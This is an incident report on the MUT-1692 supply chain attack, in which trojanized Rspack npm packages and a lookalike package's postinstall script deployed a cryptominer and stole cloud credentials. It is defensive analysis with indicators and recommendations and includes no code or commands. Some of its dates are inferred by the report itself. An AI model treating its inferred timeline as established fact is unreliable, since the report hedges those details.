Full Report
Researchers uncovered a supply chain attack carried out by a threat actor labeled MUT-1692. Initially detected via a suspicious npm package (argus3-test) mimicking a legitimate tool, the investigation revealed a postinstall script that attempted to connect to a remote C2 serve...
Analysis Summary
# Incident Report: MUT-1692 Rspack Supply Chain Compromise (Cryptojacking & Credential Theft)
## Executive Summary
Threat actor MUT-1692 executed a sophisticated supply chain attack, leveraged by compromising the credentials of a maintainer for the widely used Rspack JavaScript bundler. This resulted in trojanized packages (`@rspack/core`, `@rspack/cli` v1.1.7) being published, which deployed cryptojacking malware (XMRig) and attempted to steal cloud credentials from affected developers. The incident was first detected via a suspicious, lone npm package before the broader scope involving the Rspack infrastructure compromise was revealed.
## Incident Details
- **Discovery Date:** April 17, 2025 (Inferred from Public Date)
- **Incident Date:** Prior to April 17, 2025 (Date of initial package publication)
- **Affected Organization:** Rspack Project (Maintainer accounts compromised)
- **Sector:** Software Development / Infrastructure Tools
- **Geography:** Global (Targets East Asian cloud providers, but distribution is worldwide via npm)
## Timeline of Events
### Initial Access
- **Date/Time:** Unknown (Pre-April 17, 2025)
- **Vector:** Compromised Maintainer Credentials (Likely via credential theft techniques targeting developers)
- **Details:** MUT-1692 gained access to the credentials of a Rspack project maintainer.
### Lateral Movement
- **Date/Time:** Coordinated with package publication.
- **Vector:** Platform Manipulation (npm)
- **Details:** The attacker used compromised credentials to publish trojanized versions (v1.1.7) of the legitimate `@rspack/core` and `@rspack/cli` packages to the npm registry.
### Data Exfiltration/Impact
- **Date/Time:** Upon execution by end-users.
- **Impact:** Deployment of XMRig cryptominer and exfiltration of cloud credentials (Huawei Cloud, Alibaba Cloud, Tencent Cloud tokens).
### Detection & Response
- **Date/Time:** April 17, 2025 (Initial detection point via suspicious independent package).
- **Detection Vector:** Detection of a suspicious, misnamed npm package (`argus3-test`) containing a malicious postinstall script targeting Linux systems.
- **Response Actions:** Investigation was underway following the initial discovery, leading to the identification of the broader Rspack supply chain compromise. (Specific containment steps are partially implied but not fully detailed in context).
## Attack Methodology
- **Initial Access:** Compromised Maintainer Account Credentials (via credential theft).
- **Persistence:** N/A (Focus on immediate execution upon installation).
- **Privilege Escalation:** N/A (Executed within the context of the build process).
- **Defense Evasion:** Code Obfuscation (Multi-stage payload began with an obfuscated Node.js script).
- **Credential Access:** Scanning local directories for cloud credentials among developers.
- **Discovery:** Local file scanning for configuration data.
- **Lateral Movement:** Supply Chain Injection (Publishing malicious packages to the official registry).
- **Collection:** Targeted acquisition of cloud access tokens (Huawei, Alibaba, Tencent related).
- **Exfiltration:** Sending collected tokens to a remote server.
- **Impact:** Resource Hijacking (Cryptomining) and sensitive Cloud Credential Theft.
## Impact Assessment
- **Financial:** Resource hijacking (CPU usage for cryptomining). Potential significant financial loss due to compromised cloud resources.
- **Data Breach:** Sensitive cloud access tokens/credentials for multiple East Asian providers.
- **Operational:** Disruption to development pipelines relying on Rspack dependencies.
- **Reputational:** Significant reputational damage to the Rspack project due to supply chain compromise.
## Indicators of Compromise
- **Network Indicators:** Connection attempts to a remote C2 server from the `postinstall` script execution.
- **File Indicators:** Malicious package versions: `@rspack/core` (v1.1.7), `@rspack/cli` (v1.1.7).
- **Behavioral Indicators:** Execution of obfuscated Node.js payload downloaded from GitHub in a multi-stage attack characteristic of crypto-mining malware and credential harvesting.
## Response Actions
- **Containment Measures:** Removal/Quarantine of the compromised packages (`@rspack/core` v1.1.7, `@rspack/cli` v1.1.7) from the registry.
- **Eradication Steps:** Resetting and securing the compromised Rspack maintainer accounts.
- **Recovery Actions:** Publishing clean versions of the packages (version *after* 1.1.7).
## Lessons Learned
- Compromise of individual maintainer accounts poses a critical supply chain risk, regardless of project popularity.
- Dependency analysis must extend beyond superficial checks (like basic typosquatting) to include deep inspection of build-time scripts (`postinstall`).
- Cloud credential protection mechanisms for developers using these tools remain a high-value target for threat actors.
## Recommendations
- Implement Multi-Factor Authentication (MFA) on all registry and source code repository accounts for project maintainers.
- Enforce strict code signing or verification processes for all published package versions, especially for core infrastructure tools.
- Developers should isolate build environments and utilize least-privilege principles, preventing access to local cloud tokens during general development/build operations.